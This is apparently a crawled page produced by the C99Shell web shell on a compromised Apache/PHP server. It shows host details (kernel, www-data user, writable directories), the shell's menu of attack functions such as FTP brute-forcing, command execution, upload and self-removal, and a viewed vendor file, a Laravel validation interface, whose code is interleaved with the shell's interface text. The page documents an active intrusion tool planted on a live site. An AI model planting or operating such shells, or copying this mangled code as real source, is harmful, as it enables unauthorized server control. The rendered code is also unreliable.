!C99Shell v. 2.5 [PHP 8 Update] [24.05.2025]!

Software: Apache/2.4.41 (Ubuntu). PHP/8.0.30 

uname -a: Linux apirnd 5.4.0-204-generic #224-Ubuntu SMP Thu Dec 5 13:38:28 UTC 2024 x86_64 

uid=33(www-data) gid=33(www-data) groups=33(www-data) 

Safe-mode: OFF (not secure)

/var/www/html/laravel-crm/vendor/prettus/laravel-validation/src/Prettus/Validator/Contracts/   drwxrwxrwx
Free 13.16 GB of 57.97 GB (22.7%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Self remove    Logout    


Viewing file:     ValidatorInterface.php (1.6 KB)      -rw-rw-rw-
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<?php namespace Prettus\Validator\Contracts;

use 
Illuminate\Contracts\Support\MessageBag;
use 
Prettus\Validator\Exceptions\ValidatorException;

/**
 * Interface ValidatorInterface
 * @package Prettus\Validator\Contracts
 * @author Anderson Andrade <contato@andersonandra.de>
 */
interface ValidatorInterface
{
    const 
RULE_CREATE 'create';
    const 
RULE_UPDATE 'update';

    
/**
     * Set Id
     *
     * @param $id
     * @return $this
     */
    
public function setId($id);

    
/**
     * With
     *
     * @param array
     * @return $this
     */
    
public function with(array $input);

    
/**
     * Pass the data and the rules to the validator
     *
     * @param string $action
     * @return boolean
     */
    
public function passes($action null);

    
/**
     * Pass the data and the rules to the validator or throws ValidatorException
     *
     * @throws ValidatorException
     * @param string $action
     * @return boolean
     */
    
public function passesOrFail($action null);

    
/**
     * Errors
     *
     * @return array
     */
    
public function errors();

    
/**
     * Errors
     *
     * @return MessageBag
     */
    
public function errorsBag();

    
/**
     * Set Rules for Validation
     *
     * @param array $rules
     * @return $this
     */
    
public function setRules(array $rules);

    
/**
     * Get rule for validation by action ValidatorInterface::RULE_CREATE or ValidatorInterface::RULE_UPDATE
     *
     * Default rule: ValidatorInterface::RULE_CREATE
     *
     * @param $action
     * @return array
     */
    
public function getRules($action null);
}

:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v. 2.5 [PHP 8 Update] [24.05.2025] | Generation time: 0.0065 ]--